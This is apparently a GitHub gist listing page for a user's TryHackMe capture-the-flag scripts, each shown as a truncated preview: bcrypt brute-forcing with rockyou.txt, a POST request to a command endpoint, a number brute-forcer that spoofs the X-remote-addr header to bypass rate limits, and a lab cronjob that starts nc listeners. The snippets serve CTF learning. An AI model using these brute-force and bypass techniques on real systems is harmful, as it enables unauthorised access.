0xsan-z
/ request.py
Created
June 26, 2021 11:35
AutoLogon to a Website and send request defeating CSRF
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # -*- coding: utf-8 -*- | |
| # Author: 0xsanz | |
| import re | |
| import sys | |
| import time | |
| import requests | |
| import datetime | |
| import argparse |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #https://github.com/eclipse/paho.mqtt.python#getting-started | |
| #https://0xsanz.medium.com/broker-tryhackme-2a80dabaea56 | |
| import paho.mqtt.client as mqtt | |
| # The callback for when the client receives a CONNACK response from the server. | |
| def on_connect(client, userdata, flags, rc): | |
| print("Connected with result code "+str(rc)) | |
| # Subscribing in on_connect() means that if we lose the connection and | |
| # reconnect then subscriptions will be renewed. |
0xsan-z
/ mybcrpyt.py
Last active
March 1, 2021 23:21
Bcrypt password brute force for TryHackMe's room Lunizz CTF
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import bcrypt | |
| import base64 | |
| salt = b'$2b$12$SVInH5XmuS3C7eQkmqa6UO' | |
| mypass = b'$2b$12$SVInH5XmuS3C7eQkmqa6UOM6sDIuumJPrvuiTr.Lbz3GCcUqdf.z6' | |
| with open('/usr/share/wordlists/rockyou.txt') as fp: | |
| line = fp.readline() | |
| while line: | |
| #bpass = line.strip().encode('ascii') |
0xsan-z
/ request.php
Last active
February 27, 2021 20:32
PHP request with parameters for TryHackMe's room named Lunizz CTF
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| //https://stackoverflow.com/questions/5647461/how-do-i-send-a-post-request-with-php | |
| $url = 'http://10.8.98.192:8080/'; | |
| $data = array('password' => '[REDACTED]', 'cmdtype' => 'lsla'); | |
| // use key 'http' even if you send the request to https://... | |
| $options = array( | |
| 'http' => array( | |
| 'header' => "Content-type: application/x-www-form-urlencoded\r\n", | |
| 'method' => 'POST', |
0xsan-z
/ machine_services1320.sh
Last active
February 15, 2021 19:02
Cronjob for TryHackMe's room Inferno
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| root@Inferno:/tmp# cat /var/www/html/machine_services1320.sh | |
| pkill bash & | |
| nc -nvlp 21 & | |
| nc -nvlp 23 & | |
| nc -nvlp 25 & | |
| nc -nvlp 110 & | |
| nc -nvlp 88 & | |
| nc -nvlp 53 & | |
| nc -nvlp 194 & | |
| nc -nvlp 389 & |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /*https://0xsanz.medium.com/en-pass-tryhackme-4b319526b634*/ | |
| if($_SERVER["REQUEST_METHOD"] == "POST") | |
| { | |
| $title = $_POST["title"]; | |
| if (!preg_match('/[a-zA-Z0-9]/i' , $title )) | |
| { | |
| $val = explode(",",$title); | |
| $sum = 0; | |
| for($i = 0 ; $i < 9; $i++) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // https://0xsanz.medium.com/classic-passwd-tryhackme-60b2ad5c5008 | |
| undefined8 main(void) | |
| { | |
| vuln(); | |
| gfl(); | |
| return 0; | |
| } | |
0xsan-z
/ bfNumber.py
Last active
February 11, 2021 14:43
Python Script to Brute Force Number for TryHackMe's Room named Sustah
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # https://0xsanz.medium.com/sustah-tryhackme-45550a6fe7e3 | |
| import requests | |
| for x in range(10000, 25000): | |
| r = requests.post('http://10.10.91.116:8085', data = {'number':x},headers = {'X-remote-addr': '127.0.0.1'}) | |
| reply = r.text | |
| if "Oh no! How unlucky. Spin the wheel and try again" in r.text: | |
| print("No Dice :( for Number " + str(x)) | |
| else: |